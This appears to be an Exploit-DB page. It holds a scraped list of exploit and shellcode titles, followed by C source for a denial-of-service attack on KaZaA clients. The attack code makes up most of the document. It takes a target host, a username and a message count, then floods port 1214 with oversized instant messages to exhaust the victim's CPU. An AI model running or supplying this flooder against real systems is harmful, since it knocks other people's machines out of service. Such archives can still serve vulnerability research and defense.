
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
95 lines
No EOL
2.6 KiB
C
95 lines
No EOL
2.6 KiB
C
// source: https://www.securityfocus.com/bid/5317/info
|
|
|
|
KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition.
|
|
|
|
/*
|
|
kazaa denial of service attack
|
|
by Josh and omega
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
#include <netdb.h>
|
|
#include <sys/types.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
#include <stdarg.h>
|
|
|
|
#define PORT 1214
|
|
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
int fd, numbytes, randnum, k;
|
|
struct hostent *host;
|
|
struct sockaddr_in them;
|
|
char buf2[4026];
|
|
char buf[5000];
|
|
char *bigboy;
|
|
int i, size, j;
|
|
|
|
|
|
memset(buf2, 'a', sizeof(buf2));
|
|
buf2[sizeof(buf2)-1]='\0';
|
|
srand(time(NULL));
|
|
|
|
if (argc < 5)
|
|
{
|
|
fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per message> <username_of_target> <number_of_messages>\n", argv[0]);
|
|
exit(1);
|
|
}
|
|
if ((host=gethostbyname(argv[1])) == NULL)
|
|
{
|
|
perror("gethostbyname");
|
|
exit(1);
|
|
}
|
|
|
|
them.sin_family = AF_INET;
|
|
them.sin_port = htons(PORT);
|
|
them.sin_addr = *((struct in_addr *)host->h_addr);
|
|
memset(&(them.sin_zero), '\0', 8);
|
|
|
|
|
|
size=(4042*atoi(argv[2]))+280+1;
|
|
bigboy=(char *)malloc(size);
|
|
|
|
snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection: open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]);
|
|
|
|
/* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */
|
|
snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);
|
|
for(k=0;k<atoi(argv[2]);k++)
|
|
{
|
|
strcat(bigboy, buf);
|
|
k++;
|
|
}
|
|
strcat(bigboy, "\r\n\r\n\r\n\r\n\r\n");
|
|
|
|
fprintf(stdout, "done preparing packet... sending\n");
|
|
for(i=0, k=0;i<atoi(argv[4]);i++)
|
|
{
|
|
if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
|
|
{
|
|
perror("socket");
|
|
}
|
|
else
|
|
{
|
|
if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr)) == -1)
|
|
{
|
|
perror("connect");
|
|
}
|
|
else
|
|
{
|
|
printf("sending %d message\n", k);
|
|
write(fd, bigboy, strlen(bigboy));
|
|
k++;
|
|
close(fd);
|
|
}
|
|
}
|
|
}
|
|
fprintf(stdout, "\n%d out of %d attempted got through\n", k, i);
|
|
free(bigboy);
|
|
return 0;
|
|
} |